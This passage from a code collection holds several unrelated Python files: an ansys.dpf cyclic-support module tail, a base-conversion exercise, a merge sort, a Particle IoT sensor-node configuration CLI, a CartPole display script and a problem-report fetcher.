scoping=self._stub.List(self._message)\n .stage_infos[stage_num]\n .base_nodes_scoping,\n server=self._server,\n )\n\n def base_elements_scoping(self, stage_num=0) -> int:\n \"\"\"Retrieve an elemental scoping containing elements IDs in the\n base sector of the given stage.\n\n Parameters\n ----------\n stage_num : int, optional\n Number of the stage required (from 0 to num_stages).\n\n Returns\n -------\n base_elements_scoping : Scoping\n Elements ids in the base sector of the given stage.\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> base = cyc_support.base_elements_scoping(stage_num=1)\n\n \"\"\"\n return Scoping(\n scoping=self._stub.List(self._message)\n .stage_infos[stage_num]\n .base_elements_scoping,\n server=self._server,\n )\n\n def sectors_set_for_expansion(self, stage_num=0) -> int:\n \"\"\"Retrieve a sector's scoping of the already expanded results\n and mesh or the list of sectors that will be expanded by default.\n\n A sector's scoping starts from 0, with the maximum equal to num_sectors-1.\n\n Parameters\n ----------\n stage_num : int, optional\n Number of the stage required (from 0 to num_stages).\n\n Returns\n -------\n sectors_set_for_expansion : Scoping\n List of sectors (starting from 0 to max = num_sectors-1).\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> print(cyc_support.sectors_set_for_expansion(stage_num=1).ids)\n [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\n\n \"\"\"\n return Scoping(\n scoping=self._stub.List(self._message)\n .stage_infos[stage_num]\n .sectors_for_expansion,\n server=self._server,\n )\n\n def expand_node_id(self, node_id, sectors=None, stage_num=0):\n \"\"\"Retrieve the node IDs corresponding to the base sector node ID given in the input\n after expansion.\n\n Parameters\n ----------\n node_id : int\n Base sector's node ID to expand.\n sectors : Scoping , list of int, optional\n List of sectors to expand (from 0 to ``num_sectors - 1``).\n The default is ``None``, in which case all sectors are expanded.\n stage_num : int, optional\n Number of the stage required (from 0 to ``num_stages``).\n\n Returns\n -------\n sectors_set_for_expansion : Scoping\n List of sectors (starting from 0 to ``num_sectors - 1``).\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> print(cyc_support.expand_node_id(1,stage_num=0).ids)\n [1, 3596, 5816, 8036, 10256, 12476]\n\n \"\"\"\n if isinstance(sectors, list):\n sectors = Scoping(ids=sectors, location=\"sectors\", server=self._server)\n\n request = cyclic_support_pb2.GetExpandedIdsRequest()\n request.support.CopyFrom(self._message)\n request.node_id = node_id\n request.stage_num = stage_num\n if sectors:\n request.sectors_to_expand.CopyFrom(sectors._message)\n return Scoping(\n scoping=self._stub.GetExpandedIds(request).expanded_ids, server=self._server\n )\n\n def expand_element_id(self, element_id, sectors=None, stage_num=0):\n \"\"\"Retrieves the element IDs corresponding to the base sector element ID given in the 
input\n after expansion.\n\n Parameters\n ----------\n element_id : int\n Base sector's element ID to expand.\n sectors : Scoping or list of int, optional\n List of sectors to expand (from 0 to ``num_sectors - 1``).\n The default is ``None``, in which case all sectors are expanded.\n stage_num : int, optional\n Number of the stage required (from 0 to ``num_stages``).\n\n Returns\n -------\n sectors_set_for_expansion : Scoping\n List of sectors (starting from 0 to ``num_sectors - 1``).\n\n Examples\n --------\n >>> from ansys.dpf.core import Model\n >>> from ansys.dpf.core import examples\n >>> multi_stage = examples.download_multi_stage_cyclic_result()\n >>> cyc_support = Model(multi_stage).metadata.result_info.cyclic_support\n >>> print(cyc_support.expand_element_id(1,stage_num=0).ids)\n [1, 1558, 2533, 3508, 4483, 5458]\n\n \"\"\"\n if isinstance(sectors, list):\n sectors = Scoping(ids=sectors, location=\"sectors\", server=self._server)\n\n request = cyclic_support_pb2.GetExpandedIdsRequest()\n request.support.CopyFrom(self._message)\n request.element_id = element_id\n request.stage_num = stage_num\n if sectors:\n request.sectors_to_expand.CopyFrom(sectors._message)\n return Scoping(\n scoping=self._stub.GetExpandedIds(request).expanded_ids, server=self._server\n )\n\n def _connect(self):\n \"\"\"Connect to the grpc service\"\"\"\n return cyclic_support_pb2_grpc.CyclicSupportServiceStub(self._server.channel)\n\n def __del__(self):\n try:\n self._stub.Delete(self._message)\n except:\n pass\n","sub_path":"ansys/dpf/core/cyclic_support.py","file_name":"cyclic_support.py","file_ext":"py","file_size_in_byte":9878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"57769082","text":"import sys\nimport collections\n\nif __name__ == \"__main__\":\n # 读取第一行的n\n n = sys.stdin.readline().strip()\n n = int(n)\n\n def convertToDecimal(number, base):\n return int(str(number), base=base)\n\n def trans_map(cint):\n if cint < 0:\n print(\"不合法\")\n return\n elif cint < 10:\n return cint\n\n elif cint >= 10:\n return chr(cint - 10 + 65)\n\n def decimalConvertToBase(origin, n):\n # 10进制转换为任意进制的数\n list = []\n while True:\n # 取商\n s = origin // n\n # 取余数\n tmp = origin % n\n list.append(trans_map(tmp))\n if s == 0:\n break\n origin = s\n list.reverse()\n list = [str(each) for each in list]\n return ''.join(list)\n\n\n for _ in range(n):\n base = int(sys.stdin.readline().strip())\n line2 = sys.stdin.readline().strip().split()\n num1, num2, operation = line2\n\n\n ans = float('-inf')\n\n","sub_path":"others/2019Autumn/2tecentQ4.py","file_name":"2tecentQ4.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"158279363","text":"def merge(left, right):\n result = []\n i ,j = 0, 0\n while i < len(left) and j < len(right):\n if left[i] <= right[j]:\n result.append(left[i])\n i += 1\n else:\n result.append(right[j])\n j += 1\n result += left[i:]\n result += right[j:]\n return result\n\n\n\ndef mergeSort(alist):\n if len(alist)==1:\n return alist\n print(\"Splitting \",alist)\n mid = len(alist)//2\n lefthalf = alist[:mid]\n righthalf = alist[mid:]\n\n left = mergeSort(lefthalf)\n right = mergeSort(righthalf)\n return merge(left, right)\n\nlist_values=[2,6,3,4,7,9,3,4,6]\nprint(mergeSort(list_values))","sub_path":"Sorts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"121182602","text":"#written by kenan arica. github.com/kenanarica if you have internships for me\n\nfrom prettytable import PrettyTable\nimport json\nimport requests\nimport os\nimport sys\nfile = open(\"nodeConfigs.json\", \"a\")\nnodes = []\njsonNodes = []\naccess_token = \"\"\nbikeWaggleConfig = [ #sensorname, sensorID, enabled/disabled, sensing freq(seconds)\n ['MetMAC', 0x00, False, 30], ['TMP112', 0x01, False, 30], ['HTU21D', 0x02, False, 30], ['HIH4030', 0x03, False, 30], \n ['BMP180', 0x04, False, 30], ['PR103J2', 0x05, False, 30], ['TSL250RDMS', 0x06, False, 30], ['MMA8452Q', 0x07, False, 30],\n ['SPV1840LR5H-B', 0x08, False, 30], ['TSYS01', 0x09, False, 30], ['HMC5883L', 0x0A, False, 30], ['HIH6130', 0x0B, False, 30],\n ['APDS_9006_020', 0x0C, False, 30], ['TSL260', 0x0D, False, 30], ['TSL250RDLS', 0x0E, False, 30], ['MLX75305', 0x0F, False, 30],\n ['ML8511', 0x10, False, 30], ['TMP421', 0x13, False, 30], ['Chemsense', 0x2A, False, 30], ['AlphaHisto', 0x28, False, 30]\n]\n\ndef getToken(args):\n tokenToReturn = args\n\n for node in jsonNodes:\n \n if args == node[\"nodeID\"]:\n print(\"This node's token was matched with token of node \" + node[\"nodeID\"])\n tokenToReturn = node[\"token\"]\n return tokenToReturn\n\n\ndef sendConfig(node, args, function): \n access_token = node[\"token\"]\n \n payload = {'params': args, 'access_token':access_token}\n requests.post(\"https://api.particle.io/v1/devices/{0}/{1}/\".format(node[\"deviceID\"], function), payload)\n \n\n\"\"\" TODO:\n\n* do -h for --configure\n* make disAll and enAll, dis and en multi-node function\n* do the removeNode function\n* make -e and -d disable/enable all nodes on given node, and make it multi-node if it isn't-d\n\n\n\n\"\"\"\n\n\n\ndef fixBool(arg):\n if arg.lower() == 'yes' or arg.lower() == 'y' or arg.lower() == 'true' or arg.lower() == 'en':\n return True\n if arg.lower() == 'no' or arg.lower() == 'n' or arg.lower() == 'false' or arg.lower == 'dis':\n return False\n else:\n rerun = input(\"[X] That's not a valid option, please type True, False, yes or no: \")\n return fixBool(rerun)\n\n# changeSensorConfig(newargs = ID, enabled, senseFreq)\n# changeNodeConfig()\n# changeSensorConfig(newArgs = \"001;en;30\")\n#print(fixBool(input(\"test\")))\n\n#seeing if the config file exists. if it doesn't, create it.\n\n#seeing if the nodeConfigs.json file exists. if it doesn't, create it.\ntry:\n \n file = open(\"nodeConfigs.json\", 'r')\nexcept IOError:\n\n file = open(\"nodeConfigs.json\", 'w')\n print(\"[WARNING] No previous nodes found, and no nodeConfigs.json file found. If it's your first time using the controller, don't worry. A file will be created.\")\n\n\n\n\n\n\n\"\"\"\nStuff to do: A lot!\n\nadd a function to change enabling on different sensors and changing the frequency of sensing\n\n\n\n\"\"\"\n#change this to a request called \"enableAllSensors\" in the particle cloud\ndef enableAll():\n for node in jsonNodes:\n sendConfig(node, \"enableall\", \"nodeConfig\")\n \n\n \n#change this to a request called \"enableAllSensors\" in the particle cloud\ndef disableAll():\n for node in jsonNodes:\n sendConfig(node, \"disableall\", \"nodeConfig\")\n \ndef createCustomConfig(): \n numOfSensors = int(input(\"How many sensors would you like to have on your node?\"))\n configuration = []\n for num in range(0, numOfSensors):\n tempConfig = []\n tempConfig.append(input(\"Sensor name? \"))\n tempConfig.append(input(\"Sensor ID? \"))\n tempConfig.append(fixBool(input(\"Enabled? 
[True/False]\")))\n tempConfig.append(input(\"How often, in seconds, should the sensor collect data? \"))\n configuration.append(tempConfig)\n print(tempConfig)\n print(configuration)\n return configuration\n \n\n\n\ndef loadNodes():\n global jsonNodes, nodes\n jsonNodes = []\n nodes = []\n \n configFile = open(\"nodeConfigs.json\", \"r\")\n for line in configFile:\n jsonData = json.loads(line)\n print(\"[✓] Node with ID \" + jsonData[\"nodeID\"] + \" loaded\")\n jsonNodes.append(jsonData)\n #nodes.append(tempNodeObject)\n #print(jsonNodes)\n #print(nodes)\n\ndef configure(unparsedargs):\n #make sure nodes are loaded, we're going to overwrite the configs file every time this function is called.\n #print(unparsedargs)\n nodeToConfigure = unparsedargs[0] #name of the node that the user wants to configure\n multipleNodes = False\n \n if ',' in nodeToConfigure:\n nodeToConfigure = nodeToConfigure.split(\",\")\n multipleNodes = True\n\n if '-rn' in unparsedargs:\n newName = unparsedargs[unparsedargs.index(\"-rn\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously named {0} is now named {1}.\".format(node[\"name\"], newName))\n node[\"name\"] = newName\n else:\n for tempNode in nodeToConfigure:\n for node in jsonNodes:\n if node[\"nodeID\"] == tempNode:\n print(\"[✓] Node previously named {0} is now named {1}.\".format(node[\"name\"], newName))\n node[\"name\"] = newName\n \n \n\n if '-id' in unparsedargs:\n newID = unparsedargs[unparsedargs.index(\"-id\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously with the ID {0} now has the ID {1}.\".format(node[\"nodeID\"], newID))\n node[\"nodeID\"] = newID\n \n if '-d' in unparsedargs:\n newDisabledSetting = unparsedargs[unparsedargs.index(\"-d\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node with the ID \" + node[\"nodeID\"] + \" is now disabled.\" )\n node[\"enabled\"] = False\n sendConfig(node, \"disableall\", \"nodeConfig\")\n \n else:\n newDisabledSetting = unparsedargs[unparsedargs.index(\"-d\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"name\"] == nodeLabelToModify:\n \n print(\"[✓] Node with the ID \" + node[\"nodeID\"] + \" is now disabled.\" )\n node[\"enabled\"] = False\n\n sendConfig(node, \"disableall\", \"nodeConfig\")\n \n\n\n if '-e' in unparsedargs:\n newEnabledSetting = unparsedargs[unparsedargs.index(\"-e\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node with the ID \" + node[\"nodeID\"] + \" is now enabled.\" )\n node[\"enabled\"] = True\n sendConfig(node, \"enableall\", \"nodeConfig\")\n \n else:\n newEnabledSetting = unparsedargs[unparsedargs.index(\"-e\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n print(\"[✓] Node with the ID \" + node[\"nodeID\"] + \" is now enabled.\" )\n node[\"enabled\"] = True\n sendConfig(node, \"enableall\", \"nodeConfig\")\n \n \n\n\n if '-sdf' in unparsedargs:\n newSDFSetting = unparsedargs[unparsedargs.index(\"-sdf\") + 1]\n \n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node 
previously with the sending frequency setting {0} now has the setting {1} seconds.\".format(node[\"sendingFrequency\"], newSDFSetting))\n node[\"sendingFrequency\"] = newSDFSetting\n params = \"freqreport-\" + newSDFSetting\n sendConfig(node, params, \"nodeConfig\")\n\n else:\n newSDFSetting = unparsedargs[unparsedargs.index(\"-sdf\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n \n print(\"[✓] Node previously with the sending frequency setting {0} now has the setting {1} seconds.\".format(node[\"sendingFrequency\"], newSDFSetting))\n node[\"sendingFrequency\"] = newSDFSetting\n params = \"freqreport-\" + newSDFSetting\n sendConfig(node, params, \"nodeConfig\")\n \n\n\n\n if '-ssf' in unparsedargs:\n newSSFSetting = unparsedargs[unparsedargs.index(\"-ssf\") + 1]\n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously with the sensing frequency setting {0} now has the setting {1} seconds.\".format(node[\"sensingFrequency\"], newSSFSetting))\n node[\"sensingFrequency\"] = newSSFSetting\n\n for sensor in node[\"config\"]:\n sensor[3] = newSSFSetting\n print(\"Setting sensor with ID {0} to a sensing frequency of {1} seconds\".format(sensor[3], newSSFSetting))\n params = \"{0};_;{1}\".format(sensor[1], newSSFSetting)\n sendConfig(node, params, \"sensorConfig\")\n\n\n else:\n newSSFSetting = unparsedargs[unparsedargs.index(\"-ssf\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n print(\"[✓] Node previously with the sensing frequency setting {0} now has the setting {1} seconds.\".format(node[\"sensingFrequency\"], newSSFSetting))\n node[\"sensingFrequency\"] = newSSFSetting\n \n\n for sensor in node[\"config\"]:\n sensor[3] = newSSFSetting\n print(\"Setting sensor with ID {0} to a sensing frequency of {1} seconds\".format(sensor[3], newSSFSetting))\n params = \"{0};_;{1}\".format(sensor[1], newSSFSetting)\n sendConfig(node, params, \"sensorConfig\")\n\n \n if '-sm' in unparsedargs:\n newStatusSetting = fixBool(unparsedargs[unparsedargs.index(\"-sm\") + 1])\n command = \"\"\n\n if newStatusSetting:\n command = \"Status\" #STATUS MESSAGE NOT IMPLEMENTED\n else: \n command = \"notStatus\"\n\n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously with the status message setting {0} now has the setting {1}.\".format(node[\"statusMessage\"], newStatusSetting))\n node[\"statusMessage\"] = newStatusSetting\n else:\n newStatusSetting = unparsedargs[unparsedargs.index(\"-sm\") + 1]\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n #please help me what is going on here\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n print(\"[✓] Node previously with the status message setting {0} now has the setting {1}.\".format(node[\"statusMessage\"], newStatusSetting))\n node[\"statusMessage\"] = newStatusSetting\n \n #params = command\n #payload = {'params': params, 'access_token': access_token}\n #requests.post(\"https://api.particle.io/v1/devices/{0}/{1}/\".format(node[\"deviceID\"], \"nodeConfig\"), payload)\n\n \n\n\n if '-sd' in unparsedargs:\n newSDSetting = fixBool(unparsedargs[unparsedargs.index(\"-sd\") + 1])\n command = \"\"\n\n if newSDSetting:\n 
command = \"enableSD\"\n else:\n command = \"disableSD\"\n\n if not multipleNodes:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n print(\"[✓] Node previously with the save to SD setting {0} now has the setting {1}.\".format(node[\"saveToSD\"], newSDSetting))\n node[\"saveToSD\"] = newSDSetting\n params = command\n sendConfig(node, params, \"nodeConfig\")\n else:\n print(nodeToConfigure)\n for nodeLabelToModify in nodeToConfigure:\n\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeLabelToModify:\n print(\"[✓] Node previously with the save to SD setting {0} now has the setting {1}.\".format(node[\"saveToSD\"], newSDSetting))\n node[\"saveToSD\"] = newSDSetting\n print(\"Sending command...\")\n params = command\n sendConfig(node, params, \"nodeConfig\")\n\n\n #sen functions:\n # add/remove sensor\n # redo entire sensor config\n # change individual sensor configs \n\n###########SEN BLOCK\n\n\n if '-sen' in unparsedargs: \n function = unparsedargs[unparsedargs.index(\"-sen\") + 1]\n \n ###adding or removing a sensor. --configure [nodeName(s)] -sen [sensorID(s)] [add/remove/config] [-e [T/F], -id [newID], -ssf [seconds] ] ]\n\n # Ex usage: --configure [nodeID] -sen add\n\n if function == 'add':\n\n tempConfig = []\n tempConfig.append(input(\"Sensor name? \"))\n tempConfig.append(input(\"Sensor ID? \"))\n tempConfig.append(fixBool(input(\"Enabled? [True/False]\")))\n tempConfig.append(input(\"How often, in seconds, should the sensor collect data? \"))\n\n \n if not multipleNodes:\n\n for node in jsonNodes:\n \n if node[\"nodeID\"] == nodeToConfigure:\n node[\"config\"].append(tempConfig)\n print(\"[✓] Sensor with ID {0} has been added to Node {1}\".format(tempConfig[1], node[\"nodeID\"]))\n else:\n for nodeLabelToModify in nodeToConfigure:\n\n for node in jsonNodes:\n\n if node[\"nodeID\"] == nodeLabelToModify: \n node[\"config\"].append(tempConfig)\n print(\"[✓] Sensor with ID {0} has been added to Node {1}\".format(tempConfig[1], node[\"nodeID\"]))\n\n # Ex. 
Usage: --configure [nodeID] -sen rm [sensorID] \n\n elif function == 'rm':\n if multipleNodes == False:\n \n sensorToRemove = unparsedargs[unparsedargs.index(\"rm\") + 1]\n if ',' in sensorToRemove:\n sensorToRemove = sensorToRemove.split(\",\")\n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n for individualSensor in sensorToRemove:\n for sensor in node[\"config\"]:\n if sensor[1] == individualSensor:\n print(\"[✓] removing sensor with ID \" + individualSensor + \" from node with ID \" + node[\"nodeID\"])\n node[\"config\"].remove(sensor)\n\n else:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == sensorToRemove:\n print(\"[✓] removing sensor with ID \" + sensorToRemove)\n node[\"config\"].remove(sensor)\n else: \n \n for individualNode in nodeToConfigure:\n\n sensorToRemove = unparsedargs[unparsedargs.index(\"rm\") + 1]\n if ',' in sensorToRemove:\n sensorToRemove = sensorToRemove.split(\",\")\n\n for node in jsonNodes:\n if node[\"nodeID\"] == individualNode:\n for individualSensor in sensorToRemove:\n for sensor in node[\"config\"]:\n if sensor[1] == individualSensor:\n print(\"[✓] removing sensor with ID \" + individualSensor + \" from node with ID \" + node[\"nodeID\"])\n node[\"config\"].remove(sensor)\n\n else:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == individualNode:\n\n for sensor in node[\"config\"]:\n if sensor[1] == sensorToRemove:\n print(\"[✓] removing sensor with ID \" + sensorToRemove + \" from node with ID \" + node[\"nodeID\"])\n node[\"config\"].remove(sensor)\n \n # ex. Usage: --configure [nodeID] -sen dis [sensorID]\n \n elif function.lower() == 'dis':\n\n sensorToDisable = unparsedargs[unparsedargs.index(\"dis\") + 1]\n\n if not multipleNodes:\n \n if ',' in sensorToDisable:\n sensorToDisable = sensorToDisable.split(',')\n\n for individualSensor in sensorToDisable:\n \n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == individualSensor:\n sensor[2] = False\n print(\"Setting sensor with ID \" + individualSensor + \" to disabled.\")\n \n params = \"{0};dis;_\".format(sensor[1])\n sendConfig(node, params, \"sensorConfig\")\n else:\n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == sensorToDisable:\n sensor[2] = False\n print(\"Setting sensor with ID \" + sensorToDisable + \" to disabled.\")\n \n params = \"{0};dis;_\".format(sensor[1])\n sendConfig(node, params, \"sensorConfig\")\n\n # ex. 
Usage: --configure [nodeID] -sen en [sensorID]\n\n\n        elif function.lower() == 'en':\n\n            sensorToEnable = unparsedargs[unparsedargs.index(\"en\") + 1]\n\n            if not multipleNodes:\n\n                if ',' in sensorToEnable:\n                    sensorToEnable = sensorToEnable.split(',')\n\n                    for individualSensor in sensorToEnable:\n\n                        for node in jsonNodes:\n                            if node[\"nodeID\"] == nodeToConfigure:\n\n                                for sensor in node[\"config\"]:\n                                    if sensor[1] == individualSensor:\n                                        sensor[2] = True\n                                        print(\"Setting sensor with ID \" + individualSensor + \" to enabled.\")\n\n                                        params = \"{0};en;_\".format(sensor[1])\n                                        sendConfig(node, params, \"sensorConfig\")\n                else:\n\n                    for node in jsonNodes:\n                        if node[\"nodeID\"] == nodeToConfigure:\n\n                            for sensor in node[\"config\"]:\n                                if sensor[1] == sensorToEnable:\n                                    sensor[2] = True\n                                    print(\"Setting sensor with ID \" + sensorToEnable + \" to enabled.\")\n\n                                    params = \"{0};en;_\".format(sensor[1])\n                                    sendConfig(node, params, \"sensorConfig\")\n\n        # ex. Usage: --configure [nodeID] -sen freq [newSetting] [sensorID]\n\n        elif function.lower() == 'freq':\n\n            sensorToFreq = unparsedargs[unparsedargs.index(\"freq\") + 2]\n            newFreqSetting = unparsedargs[unparsedargs.index(\"freq\") + 1]\n\n            if not multipleNodes:\n\n                if ',' in sensorToFreq:\n                    sensorToFreq = sensorToFreq.split(',')\n\n                    for individualSensor in sensorToFreq:\n\n                        for node in jsonNodes:\n                            if node[\"nodeID\"] == nodeToConfigure:\n\n                                for sensor in node[\"config\"]:\n                                    if sensor[1] == individualSensor:\n                                        sensor[3] = newFreqSetting  # index 3 holds the sensing frequency\n                                        print(\"Setting sensor with ID \" + individualSensor + \" to a sensing freq of \" + newFreqSetting + \" seconds.\")\n                                        params = \"{0};_;{1}\".format(sensor[1], newFreqSetting)\n                                        sendConfig(node, params, \"sensorConfig\")\n\n                else:\n\n                    for node in jsonNodes:\n                        if node[\"nodeID\"] == nodeToConfigure:\n\n                            for sensor in node[\"config\"]:\n                                if sensor[1] == sensorToFreq:\n                                    sensor[3] = newFreqSetting\n                                    print(\"Setting sensor with ID \" + sensorToFreq + \" to a sensing freq of \" + newFreqSetting + \" seconds.\")\n\n                                    params = \"{0};_;{1}\".format(sensor[1], newFreqSetting)\n                                    sendConfig(node, params, \"sensorConfig\")\n\n    #at the end we save this to our objects and overwrite the nodeConfigs.json file.\n    with open('nodeConfigs.json', 'w') as outfile:\n        for node in jsonNodes:\n            json.dump(node, outfile)\n            outfile.write(\"\\n\")\n\n\ndef listNodes(args):\n\n    # --list -sen [nodeID]\n\n    if '-sen' in args:\n        t = PrettyTable(['Sensor name', 'Sensor ID', 'Enabled/Disabled', 'Reporting Frequency'])\n        nodeToSelect = args[args.index(\"-sen\") + 1]\n        for node in jsonNodes:\n            if node[\"nodeID\"] == nodeToSelect:\n                for sensor in node[\"config\"]:\n                    t.add_row([sensor[0], sensor[1], sensor[2], sensor[3]])\n    else:\n\n        t = PrettyTable(['Name', 'nodeID', 'deviceID', 'enabled', 'Sending Freq', 'Sensing Freq', 'Status Message', 'Save to SD', 'Access token'])\n        for node in jsonNodes:\n\n            t.add_row([node[\"name\"], node[\"nodeID\"], node[\"deviceID\"], node[\"enabled\"], node[\"sendingFrequency\"], node[\"sensingFrequency\"], node[\"statusMessage\"], node[\"saveToSD\"], node[\"token\"]])\n    print(t)\n\n\ndef addNode():\n    nodeName = input(\"What would you like to name your node? \")\n    nodeID = input(\"What is the node ID? \")\n    deviceID = input(\"What is the deviceID? \")\n    sendingFrequency = input(\"What would you like the SENDING frequency to be? \")\n    sensingFrequency = input(\"What would you like the SENSING frequency to be? \")\n    statusMessage = input(\"Would you like the node to send a status message? 
[True/False] \")\n saveToSD = input(\"Would you like the node to save to SD during connection loss? [True/False] \")\n defaultConfigYN = input(\"Use default config for bike waggle? [True/False]\")\n tempToken = getToken(input(\"What is this node's access token? If you want to use the same token as an existing node, just input the ID.\"))\n \n sensorConfig = []\n if defaultConfigYN.lower().startswith(\"t\"):\n sensorConfig = bikeWaggleConfig\n elif defaultConfigYN.lower().startswith(\"f\"):\n sensorConfig = createCustomConfig()\n\n\n jsonToAppend = {\n \"name\" : nodeName, # -rn \n \"nodeID\" : nodeID, # -id\n \"deviceID\" : deviceID, # -d\n \"enabled\" : False, # -e\n \"sendingFrequency\" : sendingFrequency, # -sdf\n \"sensingFrequency\" : sensingFrequency, # -ssf\n \"statusMessage\" : statusMessage, # -sm\n \"saveToSD\" : saveToSD, # - sd\n \"config\" : sensorConfig, # - sen\n \"token\" : tempToken\n }\n \n jsonNodes.append(jsonToAppend)\n\n \n with open('nodeConfigs.json', 'a') as outfile:\n json.dump(jsonToAppend, outfile)\n outfile.write(\"\\n\")\n print(jsonNodes)\n #configString = \"{{ \\\"name\\\" : \\\"{}\\\", }}\"\n\nloadNodes()\n#list of node names or node ID's. compare this to a node-lookup table if it's in name form.\n\n#import OS package and get args\nargs = sys.argv[1:] #get args here, removing the first \"controller.py entry\"\n#first, check if args are equal to non-function commands such as list nodes, help, disableAll, enableAll, addNode, removeNode\nif len(args) > 0:\n \n if args[0] == \"--help\" or args[0] == \"help\":\n\n print(\"\\nThis is a tool to configure your micro-waggle modules! Here's a list of commands: \\n\\n --help : gives you all the help you need! \\n --list : lists all nodes and their configurations \\n --enAll : enables all nodes! By default, all nodes are off out of the box. \\n --disAll : disables all nodes \\n --add: adds a new node, the parameters come after you type it! \\n --rm : lists your nodes and allows you to remove one \\n \")\n\n elif args[0] == \"--list\":\n\n listNodes(args)\n\n elif args[0] == \"--enAll\":\n\n enableAll()\n\n elif args[0] == \"--disAll\":\n\n disableAll(args[1:])\n\n elif args[0] == \"--add\":\n\n addNode()\n\n elif args[0] == \"--rm\":\n\n removeNode()\n\n elif args[0] == \"--configure\":\n\n configure(args[1:])\n\n # --config [node name] -sensorID []\nelse: \n print(\"\\nThis is a tool to configure your micro-waggle modules! Here's a list of commands: \\n\\n --help : gives you all the help you need! \\n --list : lists all nodes and their configurations \\n --enAll : enables all nodes! By default, all nodes are off out of the box. \\n --disAll : disables all nodes \\n --add: adds a new node, the parameters come after you type it! \\n --rm : lists your nodes and allows you to remove one \\n \")\n\n# I have to fix the --help interface. I'll get to it one day.\n\n","sub_path":"integrated/software/devicecontroller/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":27274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"110658006","text":"import gym\nimport tensorflow as tf\nfrom Agent import Agent\n\n# Hyper parameters\nENV_NAME = \"CartPole-v0\"\nDISPLAY_EPISODE = 50\nMAX_STEP = 1000\nHIDDEN_UNITS = 20\n\n# Initial OpenAI Gym env and DQN agent\nenv = gym.make(ENV_NAME)\nagent = Agent(env)\n# Load model\nsaver = tf.train.Saver()\nsaver.restore(agent.sess, './model/CartPole.ckpt')\n\n# Display\nfor i in xrange(DISPLAY_EPISODE):\n state = env.reset()\n for j in xrange(MAX_STEP):\n env.render()\n action = agent.action(state, policy='greedy')\n state, reward, done, _ = env.step(action)\n if done:\n break\n\n print(\"Episode: %02d\" % (i))\n","sub_path":"result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"89656126","text":"#! /usr/bin/env python\n# -*- coding: utf-8\n# @author \nimport logging\nfrom sys import argv, exit\nfrom pronto import Pronto, ProntoHttp404\n\nlogger = logging.getLogger('pronto_logger')\nlogger.setLevel(logging.CRITICAL)\np = Pronto(strict=True)\ntry:\n pr = p.problem_report(argv[1])\nexcept ProntoHttp404:\n print('NOT FOUND')\n exit(1)\nelse:\n print(pr.xml())\n","sub_path":"server/pronto/getpr.py","file_name":"getpr.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
